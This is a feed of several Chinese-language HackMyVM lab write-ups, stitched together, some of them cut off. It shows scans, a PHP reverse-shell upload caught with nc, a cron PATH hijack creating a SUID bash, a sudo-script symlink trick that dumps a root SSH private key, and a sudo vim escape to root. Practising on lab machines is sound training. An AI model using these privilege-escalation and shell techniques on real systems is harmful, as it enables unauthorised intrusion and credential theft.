moksha@hannah:/tmp$ which touch /usr/bin/touch moksha@hannah:/tmp$ ls -la /media total 12 drwxrwxrwx 3 root root 4096 ene 4 2023 . drwxr-xr-x 18 root root 4096 ene 4 2023 .. lrwxrwxrwx 1 root root 6 ene 4 2023 cdrom -> cdrom0 drwxr-xr-x 2 root root 4096 ene 4 2023 cdrom0 ``` 有一个定时任务，我们可以看到它的环境变量也有问题，所以 ``` moksha@hannah:/tmp$ echo 'cp /bin/bash /tmp/sh;chmod u+s /tmp/sh' > /media/touch moksha@hannah:/tmp$ ls /tmp/ enlIghtenment systemd-private-7e7d884382b944e89570ebdfb081124b-systemd-logind.service-Bwv8Xg systemd-private-7e7d884382b944e89570ebdfb081124b-systemd-timesyncd.service-S60g6e moksha@hannah:/tmp$ chmod +x /media/touch ``` 等子弹飞一会 ``` moksha@hannah:/tmp$ ls enlIghtenment systemd-private-7e7d884382b944e89570ebdfb081124b-systemd-logind.service-Bwv8Xg sh systemd-private-7e7d884382b944e89570ebdfb081124b-systemd-timesyncd.service-S60g6e moksha@hannah:/tmp$ ./sh -p sh-5.1# id uid=1000(moksha) gid=1000(moksha) euid=0(root) grupos=1000(moksha),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev) ``` ‍<!-- ##{'timestamp':1739012133}## -->。https://7r1UMPH.github.io/post/hmv_hannah.htmlSat, 08 Feb 2025 10:55:33 +0000https://7r1UMPH.github.io/post/hmv_uvalde.html# 0.简介 靶机：https://hackmyvm.eu/machines/machine.php?vm=Uvalde 难度：绿色 目标 IP：192.168.205.149 本机 IP：192.168.205.128 # 1.扫描 nmap起手 ``` ┌──(kali㉿kali)-[~/test] └─$ nmap -A -Pn -n --min-rate 10000 192.168.205.149 Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-08 09:15 CST Nmap scan report for 192.168.205.149 Host is up (0.00022s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:192.168.205.128 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 2 | vsFTPd 3.0.3 - secure, fast, stable |_End of status | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rw-r--r-- 1 1000 1000 5154 Jan 28 2023 output 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | ssh-hostkey: | 3072 3a:09:a4:da:d7:db:99:ee:a5:51:05:e9:af:e7:08:90 (RSA) | 256 cb:42:6a:be:22:13:2c:f2:57:f9:80:d1:f7:fb:88:5c (ECDSA) |_ 256 44:3c:b4:0f:aa:c3:94:fa:23:15:19:e3:e5:18:56:94 (ED25519) 80/tcp open http Apache httpd 2.4.54 ((Debian)) |_http-server-header: Apache/2.4.54 (Debian) |_http-title: Agency - Start Bootstrap Theme MAC Address: 08:00:27:79:3A:5B (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Device type: general purpose|router Running: Linux 4.X|5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 1 hop Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.22 ms 192.168.205.149 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.35 seconds ``` # 2.踩点 ``` ┌──(kali㉿kali)-[~/test] └─$ ftp 192.168.205.149 Connected to 192.168.205.149. 220 (vsFTPd 3.0.3) Name (192.168.205.149:kali): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -al 229 Entering Extended Passive Mode (|||61334|) 150 Here comes the directory listing. drwxr-xr-x 2 0 116 4096 Jan 28 2023 . drwxr-xr-x 2 0 116 4096 Jan 28 2023 .. -rw-r--r-- 1 1000 1000 5154 Jan 28 2023 output 226 Directory send OK. ftp> mget output mget output [anpqy?]? y 229 Entering Extended Passive Mode (|||41326|) 150 Opening BINARY mode data connection for output (5154 bytes). 100% |*****************************************************************************************| 5154 9.15 MiB/s 00:00 ETA 226 Transfer complete. 5154 bytes received in 00:00 (4.77 MiB/s) ftp> exit 221 Goodbye. ┌──(kali㉿kali)-[~/test] └─$ file output output: Unicode text, UTF-8 text, with very long lines (328), with CRLF, CR, LF line terminators, with escape sequences, with overstriking ┌──(kali㉿kali)-[~/test] └─$ cat output Script démarré sur 2023-01-28 19:54:05+01:00 [TERM='xterm-256color' TTY='/dev/pts/0' COLUMNS='105' LINES='25'] matthew@debian:~$ id uid=1000(matthew) gid=1000(matthew) groupes=1000(matthew) matthew@debian:~$ ls -al total 32 drwxr-xr-x 4 matthew matthew 4096 28 janv. 19:54 . drwxr-xr-x 3 root root 4096 23 janv. 07:52 .. lrwxrwxrwx 1 root root 9 23 janv. 07:53 .bash_history -> /dev/null -rw-r--r-- 1 matthew matthew 220 23 janv. 07:51 .bash_logout -rw-r--r-- 1 matthew matthew 3526 23 janv. 07:51 .bashrc drwx------ 3 matthew matthew 4096 23 janv. 08:04 .config drwxr-xr-x 3 matthew matthew 4096 23 janv. 08:04 .local -rw-r--r-- 1 matthew matthew 807 23 janv. 07:51 .profile -rw-r--r-- 1 matthew matthew 0 28 janv. 19:54 typescript -rwx------ 1 matthew matthew 33 23 janv. 07:53 user.txt matthew@debian:~$ toilet -f mono12 -F metal hackmyvm.eu ▄▄ ▄▄ ██ ██ ██▄████▄ ▄█████▄ ▄█████▄ ██ ▄██▀ ████▄██▄ ▀██ ███ ██▄ ▄██ ████▄██▄ ██▀ ██ ▀ ▄▄▄██ ██▀ ▀ ██▄██ ██ ██ ██ ██▄ ██ ██ ██ ██ ██ ██ ██ ██ ▄██▀▀▀██ ██ ██▀██▄ ██ ██ ██ ████▀ ▀█▄▄█▀ ██ ██ ██ ██ ██ ██▄▄▄███ ▀██▄▄▄▄█ ██ ▀█▄ ██ ██ ██ ███ ████ ██ ██ ██ ▀▀ ▀▀ ▀▀▀▀ ▀▀ ▀▀▀▀▀ ▀▀ ▀▀▀ ▀▀ ▀▀ ▀▀ ██ ▀▀ ▀▀ ▀▀ ▀▀ ███ ▄████▄ ██ ██ ██▄▄▄▄██ ██ ██ ██▀▀▀▀▀▀ ██ ██ ██ ▀██▄▄▄▄█ ██▄▄▄███ ▀▀ ▀▀▀▀▀ ▀▀▀▀ ▀▀ matthew@debian:~$ exit exit Script terminé sur 2023-01-28 19:54:37+01:00 [COMMAND_EXIT_CODE='0'] ``` 暂时没啥作用，继续踩点。https://7r1UMPH.github.io/post/hmv_uvalde.htmlSat, 08 Feb 2025 10:55:33 +0000https://7r1UMPH.github.io/post/hmv_w140.html# 0.简介 靶机：https://hackmyvm.eu/machines/machine.php?vm=W140 难度：绿色 目标 IP：192.168.205.131 本机 IP：192.168.205.128 # 1.扫描 nmap起手 ``` ┌──(kali㉿kali)-[~/test] └─$ nmap -A -Pn -n --min-rate 10000 192.168.205.131 Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-08 09:45 CST Nmap scan report for 192.168.205.131 Host is up (0.00029s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | ssh-hostkey: | 3072 ff:fd:b2:0f:38:88:1a:44:c4:2b:64:2c:d2:97:f6:8d (RSA) | 256 ca:50:54:f7:24:4e:a7:f1:06:46:e7:22:30:ec:95:b7 (ECDSA) |_ 256 09:68:c0:62:83:1e:f1:5d:cb:29:a6:5e:b4:72:aa:cf (ED25519) 80/tcp open http Apache httpd 2.4.54 ((Debian)) |_http-server-header: Apache/2.4.54 (Debian) |_http-title: w140 MAC Address: 08:00:27:EA:A7:DE (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Device type: general purpose|router Running: Linux 4.X|5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.29 ms 192.168.205.131 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.07 seconds ┌──(kali㉿kali)-[~/test] └─$ nmap -A -Pn -n --min-rate 10000 192.168.205.131 Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-08 09:45 CST Nmap scan report for 192.168.205.131 Host is up (0.00029s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | ssh-hostkey: | 3072 ff:fd:b2:0f:38:88:1a:44:c4:2b:64:2c:d2:97:f6:8d (RSA) | 256 ca:50:54:f7:24:4e:a7:f1:06:46:e7:22:30:ec:95:b7 (ECDSA) |_ 256 09:68:c0:62:83:1e:f1:5d:cb:29:a6:5e:b4:72:aa:cf (ED25519) 80/tcp open http Apache httpd 2.4.54 ((Debian)) |_http-server-header: Apache/2.4.54 (Debian) |_http-title: w140 MAC Address: 08:00:27:EA:A7:DE (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Device type: general purpose|router Running: Linux 4.X|5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.29 ms 192.168.205.131 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.07 seconds ``` # 2.踩点  有个上传页/service.html，上传个马看看。https://7r1UMPH.github.io/post/hmv_w140.htmlSat, 08 Feb 2025 10:55:33 +0000https://7r1UMPH.github.io/post/hmv_Medusa.html# 0.简介 靶机：https://hackmyvm.eu/machines/?v=Medusa 难度：绿色 目标 IP：192.168.205.145 本机 IP：192.168.205.128 # 1.扫描 nmap起手 ``` ┌──(kali㉿kali)-[~/test] └─$ nmap -A -Pn -n --min-rate 10000 192.168.205.145 Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-04 17:42 CST Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan NSE Timing: About 0.00% done Nmap scan report for 192.168.205.145 Host is up (0.00026s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | ssh-hostkey: | 3072 70:d4:ef:c9:27:6f:8d:95:7a:a5:51:19:51:fe:14:dc (RSA) | 256 3f:8d:24:3f:d2:5e:ca:e6:c9:af:37:23:47:bf:1d:28 (ECDSA) |_ 256 0c:33:7e:4e:95:3d:b0:2d:6a:5e:ca:39:91:0d:13:08 (ED25519) 80/tcp open http Apache httpd 2.4.54 ((Debian)) |_http-title: Apache2 Debian Default Page: It works |_http-server-header: Apache/2.4.54 (Debian) MAC Address: 08:00:27:5D:E9:45 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Device type: general purpose|router Running: Linux 4.X|5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 1 hop Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.26 ms 192.168.205.145 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.08 seconds ``` # 2.踩点 ``` ┌──(kali㉿kali)-[~/test] └─$ ftp 192.168.205.145 Connected to 192.168.205.145. 220 (vsFTPd 3.0.3) Name (192.168.205.145:kali): anonymous 331 Please specify the password. Password: 530 Login incorrect. ftp: Login failed ftp> ftp> exit 221 Goodbye. ``` 不许登，那去看80。https://7r1UMPH.github.io/post/hmv_Medusa.htmlTue, 04 Feb 2025 10:55:33 +0000https://7r1UMPH.github.io/post/panghu.html裙u的提权题  ``` ┌──(kali㉿kali)-[~/test] └─$ sudo arp-scan -l [sudo] kali 的密码： Interface: eth0, type: EN10MB, MAC: 00:0c:29:64:60:b9, IPv4: 192.168.205.128 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.205.1 00:50:56:c0:00:08 VMware, Inc. 192.168.205.2 00:50:56:f4:ef:6f VMware, Inc. 192.168.205.147 08:00:27:86:a6:d2 PCS Systemtechnik GmbH 192.168.205.254 00:50:56:fb:6e:be VMware, Inc. 4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.975 seconds (129.62 hosts/sec). 4 responded ┌──(kali㉿kali)-[~/test] └─$ ssh ssh@192.168.205.147 The authenticity of host '192.168.205.147 (192.168.205.147)' can't be established. ED25519 key fingerprint is SHA256:tkz/GarJpLwrGFZmgpweGf70u9znUcXycaHKGhfPRCc. This host key is known by the following other names/addresses: ~/.ssh/known_hosts:3: [hashed name] ~/.ssh/known_hosts:8: [hashed name] ~/.ssh/known_hosts:9: [hashed name] ~/.ssh/known_hosts:10: [hashed name] ~/.ssh/known_hosts:11: [hashed name] ~/.ssh/known_hosts:12: [hashed name] Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.205.147' (ED25519) to the list of known hosts. ssh@192.168.205.147's password: Welcome to Alpine! The Alpine Wiki contains a large amount of how-to guides and general information about administrating Alpine systems. See <https://wiki.alpinelinux.org/>. You can setup the system with the command: setup-alpine You may change this message by editing /etc/motd. jan:~$ sudo -l [sudo] password for ssh: Matching Defaults entries for ssh on jan: secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin Runas and Command-specific defaults for ssh: Defaults!/usr/sbin/visudo env_keep+='SUDO_EDITOR EDITOR VISUAL' User ssh may run the following commands on jan: (root) PASSWD: /opt/lzh.sh jan:~$ cat /opt/lzh.sh #!/bin/sh cd /home/ssh cat backup/hi jan:~$ cd /home/ssh/backup/ jan:~/backup$ ls -al total 12 drwxr-xr-x 2 root root 4096 Feb 3 23:28 . drwxr-sr-x 3 ssh ssh 4096 Feb 3 23:27 .. -rw------- 1 root root 9 Feb 3 23:28 hi ``` 可以看到我们是有权限改目录的，但是不能删除 ``` jan:~/backup$ cd .. jan:~$ ls -la total 12 drwxr-sr-x 3 ssh ssh 4096 Feb 3 23:27 . drwxr-xr-x 3 root root 4096 Jan 28 09:08 .. lrwxrwxrwx 1 root ssh 9 Jan 28 09:27 .ash_history -> /dev/null drwxr-xr-x 2 root root 4096 Feb 3 23:28 backup jan:~$ mv backup/ backup1 jan:~$ mkdir backup jan:~$ cd backup jan:~$ cd backup jan:~/backup$ ln -s /root/root.txt hi jan:~/backup$ sudo /opt/lzh.sh flag{LingMj} ``` 然后我就去读取密钥和shadow了，我以为没有id_rsa就是没有密钥，我就没看，哪知道  haha我真傻 ``` jan:~/backup$ rm hi jan:~/backup$ sudo /opt/lzh.sh # $OpenBSD: sshd_config,v 1.104 2021/07/02 05:11:21 dtucker Exp $ # This is the sshd server system-wide configuration file. See # sshd_config(5) for more information. # This sshd was compiled with PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin # The strategy used for options in the default sshd_config shipped with # OpenSSH is to specify options with their default value where # possible, but leave them commented. Uncommented options override the # default value. # Include configuration snippets before processing this file to allow the # snippets to override directives set in this file. Include /etc/ssh/sshd_config.d/*.conf #Port 22 #AddressFamily any #ListenAddress 0.0.0.0 #ListenAddress :: #HostKey /etc/ssh/ssh_host_rsa_key #HostKey /etc/ssh/ssh_host_ecdsa_key #HostKey /etc/ssh/ssh_host_ed25519_key # Ciphers and keying #RekeyLimit default none # Logging #SyslogFacility AUTH #LogLevel INFO # Authentication: #LoginGraceTime 2m PermitRootLogin yes strictModes yes #MaxAuthTries 6 #MaxSessions 10 #PubkeyAuthentication yes # The default is to check both .ssh/authorized_keys and .ssh/authorized_keys2 # but this is overridden so installations will only check .ssh/authorized_keys AuthorizedKeysFile ~/.ssh/authorized_keys #AuthorizedPrincipalsFile none #AuthorizedKeysCommand none #AuthorizedKeysCommandUser nobody # For this to work you will also need host keys in /etc/ssh/ssh_known_hosts #HostbasedAuthentication no # Change to yes if you don't trust ~/.ssh/known_hosts for # HostbasedAuthentication #IgnoreUserKnownHosts no # Don't read the user's ~/.rhosts and ~/.shosts files #IgnoreRhosts yes # To disable tunneled clear text passwords, change to no here! #PasswordAuthentication yes #PermitEmptyPasswords no # Change to no to disable s/key passwords #KbdInteractiveAuthentication yes # Kerberos options #KerberosAuthentication no #KerberosOrLocalPasswd yes #KerberosTicketCleanup yes #KerberosGetAFSToken no # GSSAPI options #GSSAPIAuthentication no #GSSAPICleanupCredentials yes # Set this to 'yes' to enable PAM authentication, account processing, # and session processing. If this is enabled, PAM authentication will # be allowed through the KbdInteractiveAuthentication and # PasswordAuthentication. Depending on your PAM configuration, # PAM authentication via KbdInteractiveAuthentication may bypass # the setting of 'PermitRootLogin prohibit-password'. # If you just want the PAM account and session checks to run without # PAM authentication, then enable this but set PasswordAuthentication # and KbdInteractiveAuthentication to 'no'. #UsePAM no #AllowAgentForwarding yes # Feel free to re-enable these if your use case requires them. AllowTcpForwarding no GatewayPorts no X11Forwarding no #X11DisplayOffset 10 #X11UseLocalhost yes #PermitTTY yes #PrintMotd yes #PrintLastLog yes #TCPKeepAlive yes #PermitUserEnvironment no #Compression delayed #ClientAliveInterval 0 #ClientAliveCountMax 3 #UseDNS no #PidFile /run/sshd.pid #MaxStartups 10:30:100 #PermitTunnel no #ChrootDirectory none #VersionAddendum none # no default banner path #Banner none # override default of no subsystems Subsystem sftp internal-sftp # Example of overriding settings on a per-user basis #Match User anoncvs # X11Forwarding no # AllowTcpForwarding no # PermitTTY no # ForceCommand cvs server jan:~/backup$ rm hi jan:~/backup$ ln -s /root/.ssh/id_ed25519 hi jan:~/backup$ sudo -l [sudo] password for ssh: Matching Defaults entries for ssh on jan: secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin Runas and Command-specific defaults for ssh: Defaults!/usr/sbin/visudo env_keep+='SUDO_EDITOR EDITOR VISUAL' User ssh may run the following commands on jan: (root) PASSWD: /opt/lzh.sh jan:~/backup$ sudo /opt/lzh.sh -----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW QyNTUxOQAAACCAgk7/Vhj9T7n/TV+eQ4icHmJy/M+Jp07erN+pcUwzjgAAAJB2iiMQdooj EAAAAAtzc2gtZWQyNTUxOQAAACCAgk7/Vhj9T7n/TV+eQ4icHmJy/M+Jp07erN+pcUwzjg AAAEAUhlfWSQ4VtYPAVaPWXTsnbEFiir93k1A3Icbge7uj5oCCTv9WGP1Puf9NX55DiJwe YnL8z4mnTt6s36lxTDOOAAAACHJvb3RAamFuAQIDBAU= -----END OPENSSH PRIVATE KEY----- jan:~/backup$ nano id jan:~/backup$ cat id -----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW QyNTUxOQAAACCAgk7/Vhj9T7n/TV+eQ4icHmJy/M+Jp07erN+pcUwzjgAAAJB2iiMQdooj EAAAAAtzc2gtZWQyNTUxOQAAACCAgk7/Vhj9T7n/TV+eQ4icHmJy/M+Jp07erN+pcUwzjg AAAEAUhlfWSQ4VtYPAVaPWXTsnbEFiir93k1A3Icbge7uj5oCCTv9WGP1Puf9NX55DiJwe YnL8z4mnTt6s36lxTDOOAAAACHJvb3RAamFuAQIDBAU= -----END OPENSSH PRIVATE KEY----- jan:~/backup$ chmod 600 id jan:~/backup$ ssh -i id root@127.0.0.1 The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established. ED25519 key fingerprint is SHA256:tkz/GarJpLwrGFZmgpweGf70u9znUcXycaHKGhfPRCc. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '127.0.0.1' (ED25519) to the list of known hosts. Welcome to Alpine! The Alpine Wiki contains a large amount of how-to guides and general information about administrating Alpine systems. See <https://wiki.alpinelinux.org/>. You can setup the system with the command: setup-alpine You may change this message by editing /etc/motd. jan:~# id uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video) ``` <!-- ##{'timestamp':1738666533}## -->。https://7r1UMPH.github.io/post/panghu.htmlTue, 04 Feb 2025 10:55:33 +0000https://7r1UMPH.github.io/post/hmv_friendly.html# 0.简介 靶机：https://hackmyvm.eu/machines/machine.php?vm=Friendly 难度：绿色 目标 IP：192.168.205.129 本机 IP：192.168.205.128 # 1.扫描 nmap起手 ``` ┌──(kali㉿kali)-[~/test] └─$ nmap -sT -Pn -n -p- --min-rate 10000 192.168.205.129 Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-03 12:26 CST Nmap scan report for 192.168.205.129 Host is up (0.00059s latency). Not shown: 65533 closed tcp ports (conn-refused) PORT STATE SERVICE 21/tcp open ftp 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 1.10 seconds ``` # 2.踩点 先进行ftp匿名登录 ``` ┌──(kali㉿kali)-[~/test] └─$ ftp 192.168.205.129 Connected to 192.168.205.129. 220 ProFTPD Server (friendly) [::ffff:192.168.205.129] Name (192.168.205.129:kali): anonymous 331 Anonymous login ok, send your complete email address as your password Password: 230 Anonymous access granted, restrictions apply Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -la 229 Entering Extended Passive Mode (|||17885|) 150 Opening ASCII mode data connection for file list drwxrwxrwx 2 root root 4096 Mar 11 2023 . drwxrwxrwx 2 root root 4096 Mar 11 2023 .. -rw-r--r-- 1 root root 10725 Feb 23 2023 index.html ``` 和我们发现的网页目录架构一样，我们可以尝试上传一个反弹shell上去访问 ``` ftp> put php.php local: php.php remote: php.php 229 Entering Extended Passive Mode (|||22559|) 150 Opening BINARY mode data connection for php.php 100% |*****************************************************************************************| 2596 255.89 KiB/s 00:00 ETA 226 Transfer complete 2596 bytes sent in 00:00 (241.58 KiB/s) ftp> ls 229 Entering Extended Passive Mode (|||7798|) 150 Opening ASCII mode data connection for file list -rw-r--r-- 1 root root 10725 Feb 23 2023 index.html -rw-r--r-- 1 ftp nogroup 2596 Feb 3 04:32 php.php 226 Transfer complete ``` 访问 ``` ┌──(kali㉿kali)-[~/test] └─$ nc -lvnp 8888 listening on [any] 8888 ... connect to [192.168.205.128] from (UNKNOWN) [192.168.205.129] 35158 Linux friendly 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64 GNU/Linux 23:33:07 up 7 min, 0 users, load average: 1.36, 6.63, 3.71 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) bash: cannot set terminal process group (439): Inappropriate ioctl for device bash: no job control in this shell ``` # 3. 获得稳定的 Shell 获取反向 shell 后，通过以下命令获得稳定的交互式 TTY shell： ```bash script /dev/null -c bash ctrl+z stty raw -echo; fg reset xterm export TERM=xterm echo $SHELL export SHELL=/bin/bash stty rows 59 cols 236 ``` # 4.提权 ``` www-data@friendly:/$ ls -la total 68 drwxr-xr-x 18 root root 4096 Mar 11 2023 . drwxr-xr-x 18 root root 4096 Mar 11 2023 .. lrwxrwxrwx 1 root root 7 Feb 21 2023 bin -> usr/bin drwxr-xr-x 3 root root 4096 Feb 21 2023 boot drwxr-xr-x 17 root root 3140 Feb 2 23:26 dev drwxr-xr-x 69 root root 4096 Feb 2 23:26 etc drwxr-xr-x 3 root root 4096 Feb 21 2023 home lrwxrwxrwx 1 root root 31 Feb 21 2023 initrd.img -> boot/initrd.img-5.10.0-21-amd64 lrwxrwxrwx 1 root root 31 Feb 21 2023 initrd.img.old -> boot/initrd.img-5.10.0-18-amd64 lrwxrwxrwx 1 root root 7 Feb 21 2023 lib -> usr/lib lrwxrwxrwx 1 root root 9 Feb 21 2023 lib32 -> usr/lib32 lrwxrwxrwx 1 root root 9 Feb 21 2023 lib64 -> usr/lib64 lrwxrwxrwx 1 root root 10 Feb 21 2023 libx32 -> usr/libx32 drwx------ 2 root root 16384 Feb 21 2023 lost+found drwxr-xr-x 3 root root 4096 Feb 21 2023 media drwxr-xr-x 2 root root 4096 Feb 21 2023 mnt drwxr-xr-x 2 root root 4096 Feb 21 2023 opt dr-xr-xr-x 145 root root 0 Feb 2 23:26 proc drwx------ 3 root root 4096 Mar 11 2023 root drwxr-xr-x 17 root root 540 Feb 2 23:26 run lrwxrwxrwx 1 root root 8 Feb 21 2023 sbin -> usr/sbin drwxr-xr-x 2 root root 4096 Mar 11 2023 srv dr-xr-xr-x 13 root root 0 Feb 2 23:26 sys drwxrwxrwt 2 root root 4096 Feb 2 23:26 tmp drwxr-xr-x 14 root root 4096 Feb 21 2023 usr drwxr-xr-x 12 root root 4096 Feb 21 2023 var lrwxrwxrwx 1 root root 28 Feb 21 2023 vmlinuz -> boot/vmlinuz-5.10.0-21-amd64 lrwxrwxrwx 1 root root 28 Feb 21 2023 vmlinuz.old -> boot/vmlinuz-5.10.0-18-amd64 www-data@friendly:/$ sudo -l Matching Defaults entries for www-data on friendly: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User www-data may run the following commands on friendly: (ALL : ALL) NOPASSWD: /usr/bin/vim ```  🔗https://gtfobins.github.io/gtfobins/vim/#sudo ``` www-data@friendly:/$ sudo vim -c ':!/bin/sh' # id uid=0(root) gid=0(root) groups=0(root) ``` <!-- ##{'timestamp':1738580133}## -->。https://7r1UMPH.github.io/post/hmv_friendly.htmlMon, 03 Feb 2025 10:55:33 +0000https://7r1UMPH.github.io/post/Listen.html# 0.简介 这是一个群友的靶机，我不知道他发不发布，所以就看看吧，学习学习 目标 IP：192.168.205.137 本机 IP：192.168.205.128 # 1.扫描 nmap起手 ``` ┌──(kali㉿kali)-[~/test] └─$ nmap -A -Pn -n --min-rate 10000 192.168.205.137 Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-03 13:15 CST Nmap scan report for 192.168.205.137 Host is up (0.00021s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u4 (protocol 2.0) | ssh-hostkey: | 2048 c2:91:d9:a5:f7:a3:98:1f:c1:4a:70:28:aa:ba:a4:10 (RSA) | 256 3e:1f:c9:eb:c0:6f:24:06:fc:52:5f:2f:1b:35:33:ec (ECDSA) |_ 256 ec:64:87:04:9a:4b:32:fe:2d:1f:9a:b0:81:d3:7c:cf (ED25519) 80/tcp open http nginx 1.14.2 |_http-title: \xE5\x87\x9B\xE5\x86\xBD\xE6\x99\x82\xE9\x9B\xA8 - \xE5\x85\xAC\xE5\xBC\x8F\xE3\x82\xA6\xE3\x82\xA7\xE3\x83\x96\xE3\x82\xB5\xE3\x82\xA4\xE3\x83\x88 |_http-server-header: nginx/1.14.2 MAC Address: 08:00:27:97:BD:AA (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.19 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.22 ms 192.168.205.137 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.90 seconds ``` # 2.踩点  测文件包含，测完了也没结果，所以来个目录爆破先 ``` ┌──(kali㉿kali)-[~/test] └─$ feroxbuster -u http://192.168.205.137 -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words.txt -x php,html,md,txt ___ ___ __ __ __ __ __ ___ |__ |__ |__) |__) | / ` / \ \_/ | | \ |__ | |___ | \ | \ | \__, \__/ / \ | |__/ |___ by Ben 'epi' Risher 🤓 ver: 2.11.0 ───────────────────────────┬────────────────────── 🎯 Target Url │ http://192.168.205.137 🚀 Threads │ 50 📖 Wordlist │ /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words.txt 👌 Status Codes │ All Status Codes! 💥 Timeout (secs) │ 7 🦡 User-Agent │ feroxbuster/2.11.0 💉 Config File │ /etc/feroxbuster/ferox-config.toml 🔎 Extract Links │ 